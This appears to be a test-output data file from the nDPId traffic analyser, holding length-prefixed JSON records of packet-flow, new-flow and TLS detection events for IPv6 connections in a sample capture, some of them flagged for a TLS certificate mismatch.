+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 
+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 
+00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
+00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="} +00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269143410,"flow_last_seen":1448269143410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269143410,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1448269143410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143410,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAyiAEBA\/IPrOsAwAACXenXQBu97bCAR6JAzggBADIfF3AAABAQgKEg174HFvpAM="} 
+00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143539,"pkt":"eKzApw1M9LUv\/K\/Cht1gwAAAACAGKyoDKIAQED8g+s6wDAAAJd4qAA1AAAEAA3qswP\/+pw1MAbuddHokDODe2wgFgBAAa0\/sAAABAQgKcXBUrRINT9U="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144306,"flow_last_seen":1448269144306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269144306,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1448269144306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144306,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAACagSYBu7SkSa3RTHVvgBABRwoCAAABAQgKEg18wD9sNbI="} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144348,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGNSoAFFBACwwCAAAAAAAAAJoqAA1AAAEAA3qswP\/+pw1MAbuBJtFMdW+0pEmugBABd0eeAAABAQgKP2zlshINJLA="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144450,"flow_last_seen":1448269144450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269144450,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="} 
+00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="} +00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="} 
